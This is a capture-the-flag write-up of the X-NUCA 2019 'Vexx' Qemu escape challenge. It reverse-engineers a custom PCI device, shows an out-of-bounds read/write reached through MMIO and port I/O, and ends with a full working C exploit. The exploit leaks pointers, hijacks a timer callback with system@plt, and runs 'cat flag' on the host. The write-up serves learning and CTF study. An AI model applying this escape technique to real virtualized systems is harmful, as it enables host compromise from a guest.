Mid Station

[X-NUCA 2019] Vexx - Qemu Escape

Life always gains its layers somewhere between the setbacks we take for granted and the surprises we never saw coming.

This was the first time I finished a “real-world” style challenge in a CTF. I had a lot of fun with this Qemu escape challenge, and I learned a lot about how Linux drivers work with low-level devices while solving it. Our team finished in fifth place. See you in Shenzhen at the end of 2019!

You can download the challenge archive from this link: vexx.zip. The login username is root and the password is goodluck. If you want to learn virtualization-related pwning, I believe this is a good starting point.

Recon

The structure of the provided archive file looks like this:

.
├── bzImage
├── initramfs
├── launch.sh
├── pc-bios
├── qemu-system-x86_64
└── rootfs.ext2

Let’s see what launch.sh tells us:

#!/bin/sh
./qemu-system-x86_64 -hda rootfs.ext2 -kernel bzImage -m 64M -append "console=ttyS0 root=/dev/sda oops=panic panic=1" -L ./pc-bios -netdev user,id=mynet0 -device rtl8139,netdev=mynet0 -nographic -device vexx -snapshot

Two options look suspicious at first glance. The first is -L ./pc-bios; according to --help, it sets the directory for the BIOS, VGA BIOS and keymaps. The second is -device vexx: the challenge author apparently implemented a custom device, so this is very likely the right place to look for vulnerabilities.
After running launch.sh and logging in with the credentials above, we get a root shell.

Welcome to VM world!
NeSE login: root
Password:
# id
uid=0(root) gid=0(root) groups=0(root),10(wheel)

So this challenge assumes we have full control of the guest system, and our goal is to read the flag file from the host machine. My teammate suggested some Qemu escape writeups from previous CTFs: HITB GSEC 2017: babyqemu, Hitb 2017 - Babyqemu. The writeups point out that the code of a custom device is compiled into the emulator binary. The provided emulator is version 4.0.0, so I downloaded the corresponding source and compiled it, then fed both binaries to BinDiff to see the modifications. Sorting the functions by difference quickly reveals a function called vexx_mmio_write. This looks like the right place; searching for the string “vexx” in the Functions window turns up more related functions.

As suggested by the previous writeups, we can first find the device state structure in the Local Types window:

struct VexxState
{
PCIDevice_0 pdev;
MemoryRegion_0 mmio;
MemoryRegion_0 cmb;
PortioList_0 port_list;
QemuThread_0 thread;
QemuMutex_0 thr_mutex;
QemuCond_0 thr_cond;
_Bool stopping;
uint32_t addr4;
uint32_t fact;
uint32_t status;
uint32_t irq_status;
uint32_t memorymode;
VexxRequest req;
VexxDma vexxdma;
};

and its related structures:

struct VexxRequest
{
uint32_t state;
uint32_t offset;
char req_buf[256];
};
struct VexxDma
{
uint32_t state;
dma_state dma;
QEMUTimer_0 dma_timer;
char dma_buf[4096];
uint64_t dma_mask;
};

Thanks to the debug symbols, these are pretty readable. Then we can start investigating the code from vexx_class_init:

void __fastcall vexx_class_init(ObjectClass_0 *a1, void *data)
{
PCIDeviceClass *pdev; // rbx
PCIDeviceClass *v3; // rax

pdev = (PCIDeviceClass *)object_class_dynamic_cast_assert(
a1,
(const char *)&implements_type,
"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c",
549,
"vexx_class_init");
v3 = (PCIDeviceClass *)object_class_dynamic_cast_assert(
a1,
"pci-device",
"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c",
550,
"vexx_class_init");
*(_DWORD *)&v3->vendor_id = 0x11E91234;
v3->revision = 16;
v3->realize = (void (*)(PCIDevice_0 *, Error_0 **))pci_vexx_realize;
v3->exit = (PCIUnregisterFunc *)pci_vexx_uninit;
v3->class_id = 255;
pdev->parent_class.categories[0] |= 0x80uLL;
}

This function sets the PCI vendor and device IDs with the single 32-bit store to v3->vendor_id, and it registers the realize and exit callbacks. So we can follow up with the realize function, pci_vexx_realize:
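
The packed constant is easier to read once it is split back into its two 16-bit halves. The following is a minimal sketch, assuming the usual layout where the 16-bit device_id field directly follows vendor_id in PCIDeviceClass and the host is little-endian; the names pci_id and split_pci_id are hypothetical helpers, not part of Qemu.

```c
#include <stdint.h>

/* The decompiler shows one 32-bit store covering two adjacent
 * 16-bit fields: vendor_id (low half) and device_id (high half). */
struct pci_id {
    uint16_t vendor;
    uint16_t device;
};

/* Split the packed 32-bit value back into its two IDs. */
struct pci_id split_pci_id(uint32_t packed)
{
    struct pci_id id;
    id.vendor = (uint16_t)(packed & 0xFFFF); /* low 16 bits  */
    id.device = (uint16_t)(packed >> 16);    /* high 16 bits */
    return id;
}
```

For 0x11E91234 this yields vendor 0x1234 and device 0x11E9, which are the values to look for in the vendor and device files of the PCI device directories under /sys when locating the device inside the guest.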

void __fastcall pci_vexx_realize(PCIDevice *pdev, Error_0 **errp)
{
VexxState *state; // rbx
MemoryRegion_0 *v3; // rax

state = (VexxState *)object_dynamic_cast_assert(
&pdev->qdev.parent_obj,
"vexx",
"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c",
482,
"pci_vexx_realize");
pdev->config[61] = 1;
if ( !msi_init(pdev, 0, 1u, 1, 0, errp) )
{
timer_init_full(
&state->vexxdma.dma_timer,
0LL,
QEMU_CLOCK_VIRTUAL,
1000000,
0,
(QEMUTimerCB *)vexx_dma_timer,
state);
qemu_mutex_init(&state->thr_mutex);
qemu_cond_init(&state->thr_cond);
qemu_thread_create(&state->thread, "vexx", (void *(*)(void *))vexx_fact_thread, state, 0);
memory_region_init_io(&state->mmio, &state->pdev.qdev.parent_obj, &vexx_mmio_ops, state, "vexx-mmio", 0x1000uLL);
memory_region_init_io(&state->cmb, &state->pdev.qdev.parent_obj, &vexx_cmb_ops, state, "vexx-cmb", 0x4000uLL);
portio_list_init(&state->port_list, &state->pdev.qdev.parent_obj, vexx_port_list, state, "vexx");
v3 = pci_address_space_io(pdev);
portio_list_add(&state->port_list, v3, 0x230u);
pci_register_bar(pdev, 0, 0, &state->mmio);
pci_register_bar(pdev, 1, 4u, &state->cmb);
}
}

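The calls from memory_region_init_io to portio_list_add are what really matter here. The two memory_region_init_io calls share the same pattern: each initializes a memory region for memory-mapped I/O (vexx-mmio of size 0x1000 and vexx-cmb of size 0x4000) and binds the corresponding operation callbacks to it. The portio_list_init, pci_address_space_io and portio_list_add calls set up a second I/O method: a range of I/O ports starting at 0x230, with their own handlers.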

Vulnerabilities

cmb_mmio

In the previous section we figured out which channels the device provides for interaction. There are two MMIO regions called vexx-mmio and vexx-cmb, and a series of I/O ports starting at 0x230. Each I/O channel is bound to read and write handlers. Let’s start with vexx_cmb_read and vexx_cmb_write:

int64_t __fastcall vexx_cmb_read(VexxState *state, hwaddr addr, unsigned int size)
{
uint32_t memorymode; // eax
uint64_t result; // rax

memorymode = state->memorymode;
if ( memorymode & 1 )
{
result = 255LL;
if ( addr > 0x100 )
return result;
LODWORD(addr) = state->req.offset + addr;
goto LABEL_4;
}
if ( !(memorymode & 2) )
{
result = 255LL;
if ( addr > 0x100 )
return result;
goto LABEL_4;
}
result = 255LL;
if ( addr - 0x100 > 0x50 )
return result;
LODWORD(addr) = addr - 256;
LABEL_4:
result = *(_QWORD *)&state->req.req_buf[(unsigned int)addr];
return result;
}

void __fastcall vexx_cmb_write(VexxState *state, hwaddr addr, uint64_t val, unsigned int size)
{
uint32_t memorymode; // eax
hwaddr v5; // rax

memorymode = state->memorymode;
if ( memorymode & 1 )
{
if ( addr > 0x100 )
return;
LODWORD(addr) = state->req.offset + addr;
goto LABEL_4;
}
if ( !(memorymode & 2) )
{
if ( addr > 0x100 )
return;
goto LABEL_4;
}
v5 = addr - 256;
LODWORD(addr) = addr - 256;
if ( v5 <= 0x50 )
LABEL_4:
*(_QWORD *)&state->req.req_buf[(unsigned int)addr] = val;
}

The code is neat. These functions basically perform reads and writes on state->req.req_buf, a buffer of size 0x100. I noticed that if we can set state->memorymode to 1 and state->req.offset to a non-zero value, we reach the branch that adds state->req.offset to addr. Only addr is checked against 0x100 there, not the sum, so the access can go out of bounds for both reading and writing.
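
To make the missing check concrete, here is a small host-side model of the index computation that both handlers share. It is a sketch reconstructed from the decompiled code above, not the device source; the name model_cmb_index and the -1 "rejected" return value are my own conventions.

```c
#include <stdint.h>

/* Model of how vexx_cmb_read / vexx_cmb_write turn a cmb address into
 * an index into req_buf. Returns -1 where the handlers bail out early.
 * The (uint32_t) casts mirror the LODWORD() truncation in the listing. */
int64_t model_cmb_index(uint32_t memorymode, uint32_t offset, uint64_t addr)
{
    if (memorymode & 1) {
        if (addr > 0x100)
            return -1;
        /* Only addr was checked; offset is added afterwards. */
        return (uint32_t)(offset + addr);
    }
    if (!(memorymode & 2)) {
        if (addr > 0x100)
            return -1;
        return (uint32_t)addr;
    }
    if (addr - 0x100 > 0x50)
        return -1;
    return (uint32_t)(addr - 0x100);
}
```

With memorymode = 1 and req.offset = 0xf0, an access at cmb address 0x48 resolves to index 0x138, which is 0x38 bytes past the end of the 0x100-byte req_buf. With the initial memorymode of 4, the same address simply maps to index 0x48.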

Following this idea, we find that these variables are initialized in vexx_instance_init:

void __fastcall vexx_instance_init(__int64 obj)
{
VexxState *state; // rax

state = (VexxState *)object_dynamic_cast_assert(
(Object_0 *)obj,
"vexx",
"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c",
538,
"vexx_instance_init");
state->memorymode = 4;
state->req.offset = 0;
state->vexxdma.dma_mask = 0xFFFFFFFLL;
object_property_add(
(Object_0 *)obj,
"dma_mask",
"uint64",
(ObjectPropertyAccessor *)vexx_obj_uint64,
(ObjectPropertyAccessor *)vexx_obj_uint64,
0LL,
&state->vexxdma.dma_mask,
0LL);
}

Port I/O

Soon I found that we can control those variables through port I/O.

void __fastcall vexx_ioport_write(VexxState *opaque, uint32_t addr, uint32_t val)
{
if ( addr - 560 <= 0x20 )
{
switch ( addr )
{
case 0x240u:
opaque->req.offset = val;
break;
case 0x250u:
opaque->req.state = val;
break;
case 0x230u:
opaque->memorymode = val;
break;
}
}
}

Well, the idea is pretty clear now: we can combine these two I/O channels to perform OOB R/W on the VexxState object. Right after state->req.req_buf is a VexxDma object called vexxdma.

Debugging setup

Remember that our attack target is the Qemu emulator itself, so we can simply attach gdb to the running process, e.g. sudo gdb -p $(pidof qemu-system-x86_64). We also need to copy the exploit into the guest machine. My solution is to mount the provided ext2 image, copy the exploit into it, and then launch the virtual machine again.

sudo mount ./rootfs.ext2 ./rootfs -t ext2
sudo cp $EXP_DIR/bin/release/exp rootfs/exp
sudo umount ./rootfs

Exploitation

Talking to mmio

The first step is to find a way to talk to the device and make it invoke the vulnerable functions. Hitb 2017 - Babyqemu shows how to locate the MMIO resource files in detail.
For this challenge, we can identify the two MMIO resource files by their sizes.

-rw------- 1 root root 16384 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource1 [vexx-cmb]
-rw------- 1 root root 4096 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource0 [vexx-mmio]

Then we can set up the MMIO mapping from userspace:

int fdcmb =  open("/sys/devices/pci0000:00/0000:00:04.0/resource1", O_RDWR|O_SYNC);
void * cmb = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fdcmb, 0);

If we set a breakpoint at vexx_cmb_write and copy some data to cmb, we can see the breakpoint being hit.
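
The two lines above skip error handling. A slightly more defensive variant could look like the sketch below; map_bar is a hypothetical helper name, and returning NULL on failure is my own convention rather than anything the challenge prescribes.

```c
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>
#include <unistd.h>

/* Map `len` bytes of a sysfs PCI resource file (e.g. .../resource1).
 * Returns NULL if the file cannot be opened or mapped. The pointer is
 * volatile so the compiler does not merge or drop device accesses. */
volatile uint8_t *map_bar(const char *path, size_t len)
{
    int fd = open(path, O_RDWR | O_SYNC);
    if (fd < 0)
        return NULL;

    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    close(fd); /* the mapping stays valid after the descriptor is closed */

    return p == MAP_FAILED ? NULL : (volatile uint8_t *)p;
}
```

In the guest, map_bar("/sys/devices/pci0000:00/0000:00:04.0/resource1", 0x4000) would give the cmb window and the same call on resource0 with 0x1000 the mmio window, assuming the device sits at the same PCI address as in the listing above.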

Talking to port I/O

The previous writeups didn’t cover how to talk to port I/O, so I spent some time figuring it out myself. Using I/O ports in C programs explains that we can access an I/O port with inb(port) and outb(value, port). Before that, we also need to request permission with ioperm().
The question now is: what are the port numbers? pci_vexx_realize gives us some hints:

portio_list_init(&state->port_list, &state->pdev.qdev.parent_obj, vexx_port_list, state, "vexx");
v3 = pci_address_space_io(pdev);
portio_list_add(&state->port_list, v3, 0x230u);

It seems that the ports start at 0x230, and vexx_ioport_write is where we can confirm our guess:

void __fastcall vexx_ioport_write(VexxState *opaque, uint32_t addr, uint32_t val)
{
if ( addr - 560 <= 0x20 )
{
switch ( addr )
{
case 0x240u:
opaque->req.offset = val;
break;
case 0x250u:
opaque->req.state = val;
break;
case 0x230u:
opaque->memorymode = val;
break;
}
}
}

Port 0x230 sets memorymode, and port 0x240 sets req.offset. That is all we need to perform an OOB R/W.

Leaking & Hijacking

With the OOB primitive in hand, we need to confirm its impact, that is, see what we can leak or overwrite in the object. We can set a breakpoint at vexx_cmb_write and inspect the VexxState object with the command p *(VexxState *) $rdi, since $rdi points to the object itself at that point.

pwndbg> p *(VexxState *) $rdi
$1 = {
pdev = {
qdev = {
parent_obj = {
class = 0x564be72500f0,
free = 0x7f0cc7e56ba0 <g_free>,
properties = 0x564be7f07f60,
ref = 23,
parent = 0x564be727f200
},
......
......
......
irq_status = 0,
memorymode = 4,
req = {
state = 0,
offset = 0,
req_buf = '\000' <repeats 255 times> [!!OOB HAPPEN HERE!!]
},
vexxdma = {
state = 0,
dma = {
src = 0,
dst = 0,
cnt = 0,
cmd = 0
},
dma_timer = {
expire_time = -1,
timer_list = 0x564be7256e10,
cb = 0x564be4e69f10 <vexx_dma_timer>,
opaque = 0x564be7f292c0,
next = 0x0,
attributes = 0,
scale = 1000000
},
dma_buf = '\000' <repeats 4095 times>,
dma_mask = 268435455
}
}

Once the structure is printed out, things become very clear. We can leak a code address from dma_timer.cb, which points to vexx_dma_timer, and a heap address from dma_timer.opaque, which happens to point to the VexxState object itself.
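
To know where these two pointers sit relative to req_buf, we can mirror the tail of the structure and let the compiler do the arithmetic. This is only a sketch: the field order is taken from the gdb output above, but the four dma fields being 64-bit is an assumption, and all mirror_* names and cmb_addr_for are hypothetical. Pointer fields are written as uint64_t so the layout matches the x86-64 binary.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirror of QEMUTimer as printed by gdb (pointers as uint64_t). */
struct mirror_timer {
    int64_t  expire_time;
    uint64_t timer_list;
    uint64_t cb;
    uint64_t opaque;
    uint64_t next;
    int32_t  attributes;
    int32_t  scale;
};

/* Mirror of VexxDma up to the timer; 64-bit dma fields are assumed. */
struct mirror_dma {
    uint32_t state;
    struct { uint64_t src, dst, cnt, cmd; } dma;
    struct mirror_timer dma_timer;
};

/* req_buf followed directly by vexxdma, as in VexxState. */
struct mirror_tail {
    char req_buf[256];
    struct mirror_dma vexxdma;
};

enum {
    CB_OFF     = offsetof(struct mirror_tail, vexxdma.dma_timer.cb),
    OPAQUE_OFF = offsetof(struct mirror_tail, vexxdma.dma_timer.opaque)
};

/* cmb address that reaches req_buf[target] when req.offset == window. */
uint64_t cmb_addr_for(uint64_t target, uint32_t window)
{
    return target - window;
}
```

Under these assumptions cb lands at req_buf[0x138] and opaque at req_buf[0x140]. With req.offset set to 0xf0, they are reachable at cmb addresses 0x48 and 0x50, both of which pass the addr <= 0x100 check.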

Of course, we can also overwrite these two pointers. dma_timer.cb looks like it is invoked by some kind of timing mechanism. After some investigation, I found that the callback can be triggered indirectly by a special command in vexx_mmio_write:

void __fastcall vexx_mmio_write(VexxState *vexx, hwaddr addr, uint64_t val, unsigned int size)
{
......
else if ( addr == 0x98 && val & 1 && !(vexx->vexxdma.dma.cmd & 1) )
{
vexx->vexxdma.dma.cmd = val;
v8 = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL);
timer_mod(
&vexx->vexxdma.dma_timer,
((signed __int64)((unsigned __int128)(0x431BDE82D7B634DBLL * (signed __int128)v8) >> 64) >> 18)
- (v8 >> 63)
+ 100);
}
}
}
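
The odd-looking multiplication inside the timer_mod call is a compiler-generated division by a constant: multiplying by 0x431BDE82D7B634DB, taking the high 64 bits and shifting right by 18 divides by 1,000,000, so the expression is the current time in milliseconds plus 100. The sketch below replays that arithmetic on the host; div_1e6_magic is a hypothetical name, and it relies on the GCC/Clang __int128 extension and on arithmetic right shifts of negative values.

```c
#include <stdint.h>

/* v / 1000000 the way the compiler emitted it: multiply by
 * ceil(2^82 / 10^6), keep the bits above 2^82, then add one for
 * negative inputs so the result truncates toward zero. */
int64_t div_1e6_magic(int64_t v)
{
    __int128 prod = (__int128)0x431BDE82D7B634DBLL * (__int128)v;
    int64_t high = (int64_t)(prod >> 64); /* upper 64 bits of the product */
    return (high >> 18) - (v >> 63);      /* v >> 63 is -1 for negative v */
}
```

So writing a value with bit 0 set to offset 0x98 arms dma_timer to fire roughly 100 ms later, which is when dma_timer.cb gets called.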

vexx_mmio_write registers an event with the timer instead of acting on the value right away. When the timer expires, it calls dma_timer.cb with dma_timer.opaque as the first argument. Therefore, we can use the OOB write to point dma_timer.cb at system@plt and dma_timer.opaque at a command string such as "/bin/sh". When the timer fires, it should give us a shell! Well, after some tries, system("/bin/sh") did not work because the emulator just hung there, but we can use system("cat flag") instead to obtain the glorious flag!
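
The address arithmetic behind this step is short enough to check by hand. The sketch below uses the three offsets from my exploit (0x4dcf10 for vexx_dma_timer, 0x2ab860 for system@plt, 0xb90 for req_buf inside VexxState); they only hold for the provided binary, and the struct and function names are hypothetical.

```c
#include <stdint.h>

struct targets {
    uint64_t base;       /* load address of qemu-system-x86_64       */
    uint64_t system_plt; /* value to write into dma_timer.cb         */
    uint64_t cmd_str;    /* value to write into dma_timer.opaque     */
};

/* Turn the two leaked pointers into the two values to write back. */
struct targets resolve_targets(uint64_t leak_cb, uint64_t leak_opaque)
{
    struct targets t;
    t.base       = leak_cb - 0x4dcf10;  /* cb leaked as vexx_dma_timer   */
    t.system_plt = t.base + 0x2ab860;   /* system@plt in this binary     */
    t.cmd_str    = leak_opaque + 0xb90; /* &state->req.req_buf[0]        */
    return t;
}
```

Feeding in the pointers from the gdb session above (cb = 0x564be4e69f10, opaque = 0x564be7f292c0) gives a page-aligned base of 0x564be498d000, which is a quick sanity check that the first offset is right.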

Exp

#define _GNU_SOURCE

#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <dirent.h>
#include <time.h>
#include <signal.h>
#include <sys/auxv.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/uio.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sched.h>
#include <sys/io.h>

#define PORT_MEMORYMODE 0x230
#define PORT_OFFSET 0x240
#define PORT_STATE 0x250

// -rw------- 1 root root 16384 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource1 [vexx-cmb]
// -rw------- 1 root root 4096 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource0 [vexx-mmio]

char* cmb;
char* mmio;

size_t leak_code = 0;
size_t leak_heap = 0;
size_t code = 0;
size_t cmd_str = 0;

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

// Every access to the cmb mapping ends up in vexx_cmb_write / vexx_cmb_read.
// volatile keeps the compiler from merging or dropping these accesses.
void cmbwrite(uint64_t addr, uint64_t value)
{
    *((volatile uint64_t*)(cmb + addr)) = value;
}

uint64_t cmbread(uint64_t addr)
{
    return *((volatile uint64_t*)(cmb + addr));
}


void do_leak() {
    // 0x55fa155ecf10 (vexx_dma_timer) at req_buf[0x138]
    // memorymode is still 4 here, so the command string lands at req_buf[0]
    strcpy(cmb, "/bin/cat flag\x00");
    outb(0xf0, PORT_OFFSET);          // req.offset = 0xf0
    outb(0x1, PORT_MEMORYMODE);       // memorymode = 1: index = req.offset + addr
    leak_code = cmbread(0x138-0xf0);  // cb = vexx_dma_timer
    leak_heap = cmbread(0x140-0xf0);  // opaque = state
}

void hijack() {
    size_t system_plt = code + 0x2ab860;  // system@plt in the provided binary
    cmbwrite(0x138-0xf0, system_plt);     // rip: dma_timer.cb
    cmbwrite(0x140-0xf0, cmd_str);        // rdi: dma_timer.opaque
}


void trigger() {
    // addr == 0x98 with bit 0 set arms dma_timer, which later calls cb(opaque)
    *((volatile int32_t*)(mmio + 0x98)) = 1;
}

int main(int argc, char *argv[]) {
    (void)argc; (void)argv;
    int res = 0;
    int fdcmb = open("/sys/devices/pci0000:00/0000:00:04.0/resource1", O_RDWR|O_SYNC);
    if (fdcmb < 0) {
        die("fdcmb open");
    }
    cmb = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fdcmb, 0);
    if (cmb == MAP_FAILED) {
        die("cmb");
    }

    int fdmmio = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR|O_SYNC);
    if (fdmmio < 0) {
        die("fdmmio open");
    }
    mmio = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fdmmio, 0);
    if (mmio == MAP_FAILED) {
        die("mmio");
    }

    // Allow access to ports 0x230..0x25f from userspace
    res = ioperm(0x230, 0x30, 1);
    if (res < 0) {
        die("ioperm");
    }

    do_leak();
    printf("leak code: 0x%lx\n", leak_code);
    code = leak_code-0x4dcf10;       // offset of vexx_dma_timer in the binary
    printf("code: 0x%lx\n", code);
    printf("leak heap: 0x%lx\n", leak_heap);
    cmd_str = leak_heap + 0xb90;     // address of req_buf, which holds the command
    printf("cmd: 0x%lx\n", cmd_str);

    hijack();
    trigger();

    return 0;
}

Wrapup

This challenge is not as difficult as it looks. Qemu escape sounds scary, but the vulnerability logic is simple and the exploitation is fairly straightforward. It just requires some patience and confidence! From this challenge, I learned how to access low-level devices from userspace with MMIO or port I/O. I think building the exploit on top of these communication channels is the general pattern for VM-escape style CTF challenges.

References

  1. https://uaf.io/exploitation/2018/11/22/Hitb-2017-babyqemu.html
  2. https://kitctf.de/writeups/hitb2017/babyqemu
  3. https://bbs.pediy.com/thread-252385.htm
  4. https://blog.eadom.net/writeups/qemu-escape-vm-escape-from-0ctf-2017-finals-writeup/
  5. https://dangokyo.me/2018/03/25/hitb-xctf-2017-babyqemu-write-up/